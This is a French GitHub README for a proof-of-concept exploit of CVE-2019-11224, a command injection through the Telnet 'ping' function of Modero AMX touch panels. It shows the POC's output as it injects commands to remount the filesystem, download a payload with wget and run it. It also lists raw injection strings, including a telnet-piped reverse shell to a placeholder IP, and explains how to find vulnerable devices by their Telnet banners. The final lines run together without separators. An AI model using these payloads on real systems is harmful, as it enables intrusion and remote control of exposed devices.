
Modero AMX Code Execution (CVE-2019–11224)
Ce dépôt contient quelques sources concernant CVE-2019–11224 (https://link.medium.com/zukA0oCnV8) car j'ai remarqué que le lien ne fonctionne plus sur le site officiel de la NIST.
Les appareils Modero AMX sont essentiellement des panneaux tactiles pour salles de réunion, on peut les observer dans de nombreux environnements différents et ils ont généralement Telnet ouvert.
Comme ils émulent une console loin d'être idéale via Telnet, il existe une vulnérabilité d'injection de code via la fonction "ping" en utilisant des séparateurs de commandes.
Depuis la création initiale de ce dépôt GitHub et les tests sur les appareils AMX, j'ai créé un POC et un processus d'exploitation pour obtenir des shells inversés avec cette vulnérabilité. J'espère que cela vous apporte de la joie :}
J'ai écrit un POC amx_pwn.py qui devrait être utile. Exemple de sortie ci-dessous :
┌──(cozyfox㉿submarine)-[/CVE-2019-11224]
└─$ python3 amx_pwn.py -t 192.168.0.21 -fs 192.168.0.41 -fn something.jpg -v 1
[!] Your current settings are:
[*] Target: 192.168.0.21
[*] FileServer and Filename URL: http://192.168.0.41/something.jpg
[*] Verbosity: 1
(^_^)7 Continue? (Y/N): y
[*] RUNNING
Telnet(192.168.0.21,23): recv b'\xff\xfb\x01\r\nWelcome to Modero v2.86.50 Copyright (C) AMX '
Telnet(192.168.0.21,23): IAC WILL 1
Telnet(192.168.0.21,23): recv b'LLC 2002-2009\r\n>'
b'\r\nWelcome to Modero v2.86.50 Copyright (C) AMX LLC 2002-2009\r\n>'
Telnet(192.168.0.21,23): send b"ping ;CMD=$'\\x20-o\\x20remount,rw\\x20/'&&mount$CMD\r\n"
Telnet(192.168.0.21,23): recv b'\xff\xfc\x01'
Telnet(192.168.0.21,23): IAC WONT 1
<..cut to remove clutter...>
Telnet(192.168.0.21,23): recv b'\xff\xfc\x01'
Telnet(192.168.0.21,23): IAC WONT 1
taking a snooze
Telnet(192.168.0.21,23): send b"ping ;CMD=$'\\x20http://192.168.0.41/something.jpg'&&wget$CMD\r\n"
taking a snooze
...
ping ;CMD=$'\x20-o\x20remount,rw\x20/'&&mount$CMDtelnet {YOUR_IP} 1332 | /bin/sh | telnet {YOUR_IP} 1333ping ;CMD=$'\x20http://{YOUR_SYSTEM}/{YOUR_FILE}'&&wget$CMDping ;CMD=$'\x20{YOUR_FILE}'&&/bin/sh$CMDRecherchez les bannières Telnet (généralement le port 23) contenant :
Welcome to Modero: ou Copyright (C) AMX LLC. Recherchez les versions antérieures à 2.87.13